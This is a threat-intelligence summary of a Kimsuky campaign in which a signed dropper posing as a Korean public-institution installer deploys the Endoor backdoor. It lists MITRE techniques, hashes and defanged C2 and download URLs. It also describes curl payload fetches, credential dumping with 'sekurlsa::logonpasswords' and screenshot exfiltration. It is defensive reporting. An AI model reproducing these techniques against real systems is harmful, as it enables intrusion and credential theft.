Malicious code disguised as installation files of domestic public institutions (Kimsuky group)

AhnLab ASEC warns that the Kimsuky group distributed a signed dropper pretending to be an installer for a Korean public institution, which unpacks an encrypted payload and deploys the Endoor backdoor. The dropper extracts src.rar using password “1q2w3e4r”, installs Endoor as %USERPROFILE%svchost.exe, registers a scheduled task “Windows Backup”, and the backdoor communicates with C2 domains including ngrok-free[.]app. #Kimsuky #Endoor

Keypoints

Attackers used a signed dropper masquerading as an installer for a domestic public institution to lure execution.
The dropper contains an internal archive (src.rar) and an embedded unrar.exe; extraction uses password “1q2w3e4r”.
The deployed backdoor (Endoor), written in Go, copies itself to %USERPROFILE%svchost.exe and registers a scheduled task named “Windows Backup” to persist.
Endoor supports command execution, file upload/download, process control, and a Socks5 proxy, and communicates with C2 domains including ngrok-free[.]app.
Operators fetched additional payloads via curl (e.g., rdpclip.dat), deployed credential-stealing tools (Mimikatsu) and a screenshot-stealer using kbinani/screenshot, exfiltrating via a local proxy.
Nikidoor, another Kimsuky backdoor, shares C2 infrastructure and was also observed in related incidents.

MITRE Techniques

[T1204] User Execution – The dropper was distributed as an installation file to prompt user execution (‘the dropper malware was disguised as an installation file for a specific public institution in Korea.’).
[T1036] Masquerading – Malicious binary used institution logo and version metadata to appear legitimate (‘The icon was used as the logo of the relevant public institution, and related keywords can be found on the version information or installation page.’).
[T1553] Signed Binary Proxy Execution/Code Signing – Malware was signed with a valid certificate to evade suspicion (‘signing with a valid certificate from a domestic company.’).
[T1053] Scheduled Task/Job – The backdoor registers a scheduled task named “Windows Backup” to achieve persistence (‘registers itself in the task scheduler under the name “Windows Backup.”’).
[T1105] Ingress Tool Transfer – Operators downloaded additional binaries externally using curl (saved as rdpclip.dat) to update implants (‘downloaded externally using Curl under the name “rdpclip.dat”’).
[T1071] Application Layer Protocol – Endoor uses web-based C2 channels, notably ngrok-free[.]app, for command-and-control (‘using Ngrok’s free domain address “ngrok-free[.]app” as its C&C server.’).
[T1003] Credential Dumping – Attackers executed a credential-stealing tool with sekurlsa commands to harvest credentials (‘the “sekurlsa::logonpasswords” argument was confirmed in the execution log’).
[T1113] Screen Capture – A malicious component captured and exfiltrated screenshots using kbinani/screenshot (‘the malware was created using Kbinani’s screenshot library … the attacker implemented a function to not only capture screenshots but also leak them.’).
[T1090] Proxy – The backdoor supports Socks5 proxy functionality to route traffic or exfiltrate data (‘supports functions such as command execution, file upload and download, process operation, and Socks5 proxy.’).

Indicators of Compromise

[MD5] File hashes – b74efd8470206a20175d723c14c2e872 (Dropper signed as App.exe), 7034268d1c52539ea0cd48fd33ae43c4 (Endoor svchost.exe), and 3 more hashes.
[C2 Address] Command-and-control domains – real-joey-nicely.ngrok-free[.]app/mir/index.php, fitting-discrete-lemur.ngrok-free[.]app/minish/index.php, and minish.wiki[.]gd (shared infrastructure).
[Download URL] External payloads – hxxp://210.16.120[.]210/rdpclip.dat (estimated Endoor download), hxxp://minish.wiki[.]gd/eng.db (Endoor additional confirmation).
[File Names] Deployed filenames/paths – %USERPROFILE%svchost.exe (Endoor persistence), %ALLUSERSPROFILE%cache.exe (Mimikatsu), rdpclip.dat (downloaded payload).

The technical infection chain begins with a signed dropper crafted to look like an installer for a domestic public institution: it carries institution-specific icons and metadata to entice execution. When run, the dropper drops an internal archive named src.rar and an embedded unrar.exe, then uses the hardcoded password “1q2w3e4r” to extract the payload and run a backdoor binary.

The extracted backdoor, identified as Endoor and written in Go, accepts an “install” argument to self-copy to %USERPROFILE%svchost.exe and then registers itself as a scheduled task called “Windows Backup” executed with a “backup” argument for persistence. Endoor communicates with C2 servers (notably ngrok-free[.]app), supports command execution, file upload/download, process control, and provides a Socks5 proxy, enabling remote control and tunneled traffic.

Post-compromise actions observed include fetching additional binaries via curl (saved as rdpclip.dat), deploying credential theft tooling (Mimikatsu executed with “sekurlsa::logonpasswords”), and running a screenshot-stealer built on kbinani/screenshot that posts captures to a local endpoint (hxxp://127.0.0.1:8080/recv) — indicating use of local proxies to stage exfiltration. Related backdoors (Nikidoor) share C2 infrastructure and were observed in parallel incidents.

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print